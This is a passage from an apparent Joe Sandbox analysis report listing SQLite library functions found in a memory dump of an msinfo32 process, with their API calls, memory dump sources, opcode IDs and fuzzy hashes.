                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_create_function_v2sqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_mutex_leavesqlite3_vmprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 946922136-0
                                                                                                              • Opcode ID: 3951b62936b1d8272ddb70a624ec12b85c1f721875c9ddb265e5c04cb3627a0f
                                                                                                              • Instruction ID: 0b510d31432aa36c2a26ab8ad54d7fbe984aef7b04c38a472c59b40f16f39a54
                                                                                                              • Opcode Fuzzy Hash: 3951b62936b1d8272ddb70a624ec12b85c1f721875c9ddb265e5c04cb3627a0f
                                                                                                              • Instruction Fuzzy Hash: 5F1118B0A083529BD7009F65C88075EBBE5EFC4358F24C82DE8889B355D779D9458B92
                                                                                                              Function 61E3C83D Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3C88F
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3C8A9
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C8B1
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3C8BB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3282944778-0
                                                                                                              • Opcode ID: 7290b901b2a5f51f00b680605b1ed145903a1284dd93cac383136e42780f2ab2
                                                                                                              • Instruction ID: 21197a6d9c74e5a9059c470ce91a9e3c602899f013e0444f139a987b8ca70da2
                                                                                                              • Opcode Fuzzy Hash: 7290b901b2a5f51f00b680605b1ed145903a1284dd93cac383136e42780f2ab2
                                                                                                              • Instruction Fuzzy Hash: 190161B1E087668ADB109F65C44465EFFF4AFC5764F24C92ED89887340E738D682CB92
                                                                                                              Function 61E90C11 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E90C1D
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E90C37
                                                                                                              • sqlite3_realloc64.SQLITE3 ref: 61E90C6C
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E90C94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 1177761455-0
                                                                                                              • Opcode ID: e3fd59b9eea00ffa2ae44d1870696a66d231743ab5a2877e5dea7e3b7fa77847
                                                                                                              • Instruction ID: 0b628a25517e756eb730eee3c14d8112923c0e8a137940aecdd99193803dfa7f
                                                                                                              • Opcode Fuzzy Hash: e3fd59b9eea00ffa2ae44d1870696a66d231743ab5a2877e5dea7e3b7fa77847
                                                                                                              • Instruction Fuzzy Hash: DB018C70A487898BD7049F68C4C07197BECEB8A358F64C878D998CB310E371D4418781
                                                                                                              Function 61E91D10 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __dllonexit_lock_onexit_unlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 209411981-0
                                                                                                              • Opcode ID: a1df7f09b53e4bf20bd3693fec2213819384312110bd7d69a726d0d0a9131de5
                                                                                                              • Instruction ID: 2a475b9b66559f6bf5eb56376790b4dc816ce8216590cd143c3d8bfb03f1d8a1
                                                                                                              • Opcode Fuzzy Hash: a1df7f09b53e4bf20bd3693fec2213819384312110bd7d69a726d0d0a9131de5
                                                                                                              • Instruction Fuzzy Hash: 71117CB59197468FCB40EFB9C48451EBBE1AB99354F218D2EE8C487340EB35D498CB92
                                                                                                              Function 61E26258 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_freesqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3222608360-0
                                                                                                              • Opcode ID: 7ac71f5ee5fa15e17e1faf8d33fcc732679b536dfabb653b4d9ace756d69a5f4
                                                                                                              • Instruction ID: 6656e3d620bc123a557545fe48d2ea9a8bea93117f0eb8683666700b750a7214
                                                                                                              • Opcode Fuzzy Hash: 7ac71f5ee5fa15e17e1faf8d33fcc732679b536dfabb653b4d9ace756d69a5f4
                                                                                                              • Instruction Fuzzy Hash: CF010875A04A559FCB00EFA8C4C4909BBF0FF8A758B258A59E8488F305D330E955CBD1
                                                                                                              Function 61E3BFAB Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3BFCC
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_initialize.SQLITE3 ref: 61E37BD1
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_str_vappendf.SQLITE3 ref: 61E37C1C
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3BFF6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C001
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C014
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_initializesqlite3_mprintfsqlite3_str_vappendfsqlite3_vmprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3342067426-0
                                                                                                              • Opcode ID: 8b06f6755300361d884ebdb6a29ad3761dfbe2899671bd5e2167cdb1e4d8286c
                                                                                                              • Instruction ID: 48d466ccbe29b61471665eceeb16935be062b830ae8ed98ab5f636212af1af02
                                                                                                              • Opcode Fuzzy Hash: 8b06f6755300361d884ebdb6a29ad3761dfbe2899671bd5e2167cdb1e4d8286c
                                                                                                              • Instruction Fuzzy Hash: 40010CB0A047569FD7109FA9C48065AFBF4EF88354F20842DE989C7300E735D490CB52
                                                                                                              Function 61E0A645 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A67D
                                                                                                                • Part of subcall function 61E0A484: sqlite3_free.SQLITE3 ref: 61E0A4A5
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A690
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A672
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E0A6B6
                                                                                                                • Part of subcall function 61E0A61B: sqlite3_free.SQLITE3 ref: 61E0A62C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 3930042888-0
                                                                                                              • Opcode ID: 29e8ae0f5494ab8a612f1f888ab6182f37c100db74b13a36ff71eb97d14f9ccf
                                                                                                              • Instruction ID: c27026619afa0b5ff4c2434fd55e8317a5299175ae3e27c2023a4ca2d52f48f1
                                                                                                              • Opcode Fuzzy Hash: 29e8ae0f5494ab8a612f1f888ab6182f37c100db74b13a36ff71eb97d14f9ccf
                                                                                                              • Instruction Fuzzy Hash: 41014F31944A498BCB00EF79D8C899EF7F4EFC4319F20886AD4468B354E738D8568B51
                                                                                                              Function 61E1DD59 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_aggregate_context.SQLITE3 ref: 61E1DD6E
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E1DD9E
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E1DDB4
                                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E1DDCC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779139978-0
                                                                                                              • Opcode ID: d0d5b65c2cbb133f71605c28382c908665e1f60f5bf8337089ab14aa5fee2a39
                                                                                                              • Instruction ID: be36baf53dbb9b866458dbdd99a3ac6232c7cd45a47de8722ec4d35973ed6d0b
                                                                                                              • Opcode Fuzzy Hash: d0d5b65c2cbb133f71605c28382c908665e1f60f5bf8337089ab14aa5fee2a39
                                                                                                              • Instruction Fuzzy Hash: 230121B440C745AEDB00AF64C48A719BFE0FF85318F66C69DD4944B2AAD771C494C743
                                                                                                              Function 61E19049 Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E19057
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1906F
                                                                                                              • strcmp.MSVCRT ref: 61E1908C
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E1909D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2933023327-0
                                                                                                              • Opcode ID: 1fdff4fba269335263f8abb4f6b3da8a49da1f4b43a6fc2299f4ecd400d08dfb
                                                                                                              • Instruction ID: a47e1033bd1de3147a15147846171a03a49763444f4c025b221133f492f0873b
                                                                                                              • Opcode Fuzzy Hash: 1fdff4fba269335263f8abb4f6b3da8a49da1f4b43a6fc2299f4ecd400d08dfb
                                                                                                              • Instruction Fuzzy Hash: E9F09071A0D3514BEB006FF984C161ABBA8EB82358F24C43CED488B305D771D85147A1
                                                                                                              Function 61E3AE97 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_vmprintf.SQLITE3 ref: 61E3AEB0
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_initialize.SQLITE3 ref: 61E37BD1
                                                                                                                • Part of subcall function 61E37BCA: sqlite3_str_vappendf.SQLITE3 ref: 61E37C1C
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3AECE
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3AEDA
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3AEE2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_entersqlite3_str_vappendf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2498652501-0
                                                                                                              • Opcode ID: eafc7faeead84d67688c95a6a5a02606c66e203a4712a968a2658c50b1fb2443
                                                                                                              • Instruction ID: 75dad038be49410520c5d6f2648bd251a965843ce64d4af4e21bd13664d193eb
                                                                                                              • Opcode Fuzzy Hash: eafc7faeead84d67688c95a6a5a02606c66e203a4712a968a2658c50b1fb2443
                                                                                                              • Instruction Fuzzy Hash: 87F05E71A047659F9B00AFAD888045EBBE8EEC4654F11C83EE98DC7300F730C840D7A2
                                                                                                              Function 61E3BDC9 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_value_pointer.SQLITE3 ref: 61E3BDE0
                                                                                                                • Part of subcall function 61E0E6B2: strcmp.MSVCRT ref: 61E0E6E0
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3BDF9
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3BE0F
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3BE17
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2416658597-0
                                                                                                              • Opcode ID: bb7a3ef8e6ea67db5deaefc35ad2afac29a0ce0b5f97dfc5728a7512a886eef8
                                                                                                              • Instruction ID: 265902959247c3317ceb34769e1961c8f60351429da56095b3ea9c982a7aac3c
                                                                                                              • Opcode Fuzzy Hash: bb7a3ef8e6ea67db5deaefc35ad2afac29a0ce0b5f97dfc5728a7512a886eef8
                                                                                                              • Instruction Fuzzy Hash: B9F05EB090C7159BC700BF6D988161ABBE4EB85664F20CA2DE59CCB381E734C4908B92
                                                                                                              Function 61E4B255 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E4B236: sqlite3_blob_close.SQLITE3 ref: 61E4B244
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B27C
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B287
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B292
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4B29A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_blob_closesqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 1319845086-0
                                                                                                              • Opcode ID: 2ca99b650c83fa522fd1125df6d5210cf5d48fd29c5eb3f09b68801890af1500
                                                                                                              • Instruction ID: c8cd6b8badaae1739b7b09a8ae277a3f35c8906020eadd5ca4b77c9b1fa56753
                                                                                                              • Opcode Fuzzy Hash: 2ca99b650c83fa522fd1125df6d5210cf5d48fd29c5eb3f09b68801890af1500
